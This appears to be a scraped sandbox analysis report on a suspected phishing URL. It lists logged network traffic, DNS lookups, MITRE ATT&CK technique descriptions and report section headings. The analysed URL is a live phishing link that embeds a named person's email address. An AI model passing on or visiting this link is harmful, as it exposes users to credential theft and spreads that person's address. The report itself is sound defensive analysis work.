Source: global traffic	HTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=RT2Ar76CfwNaFOF&MD=4E5ho6Ol HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net

Source: global traffic	DNS traffic detected: DNS query: voyages-moinschers.fr
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: www.idcom-france.com

Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.0
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.0
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.0
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.0
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.0
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.0
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.0
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.0
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.0
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.0
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.0
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.0
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 20.223.36.55
Source: unknown	TCP traffic detected without corresponding DNS query: 20.223.36.55
Source: unknown	TCP traffic detected without corresponding DNS query: 20.223.36.55
Source: unknown	TCP traffic detected without corresponding DNS query: 20.223.36.55
Source: unknown	TCP traffic detected without corresponding DNS query: 20.223.36.55
Source: unknown	TCP traffic detected without corresponding DNS query: 20.223.36.55
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.0
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.0
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.0
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.0
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.0
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.0
Source: unknown	TCP traffic detected without corresponding DNS query: 20.223.36.55
Source: unknown	TCP traffic detected without corresponding DNS query: 20.223.36.55
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.0
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.0
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.0
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.0
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.0
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.0
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.0
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.159.0
Source: unknown	TCP traffic detected without corresponding DNS query: 20.223.36.55
Source: unknown	TCP traffic detected without corresponding DNS query: 20.223.36.55
Source: unknown	TCP traffic detected without corresponding DNS query: 20.223.36.55
Source: unknown	TCP traffic detected without corresponding DNS query: 20.223.36.55
Source: unknown	TCP traffic detected without corresponding DNS query: 20.223.36.55
Source: unknown	TCP traffic detected without corresponding DNS query: 20.223.36.55

Description:	Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring Application Access Token .
Tactics:	Initial Access
Data Sources:	Application Log: Application Log Content, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Process: Process Creation
Platforms:	Linux, macOS, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report https://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.com

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Networking

System Summary

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 135

Chrome Cache Entry: 136

Chrome Cache Entry: 137

Chrome Cache Entry: 138

Chrome Cache Entry: 139

Chrome Cache Entry: 140

Static File Info

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Analysis Process: chrome.exePID: 7112, Parent PID: 4024

General

Chronological Activities

Analysis Process: chrome.exePID: 2672, Parent PID: 7112

General

Chronological Activities

Analysis Process: chrome.exePID: 5844, Parent PID: 4024

General

Windows Analysis Report
https://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.com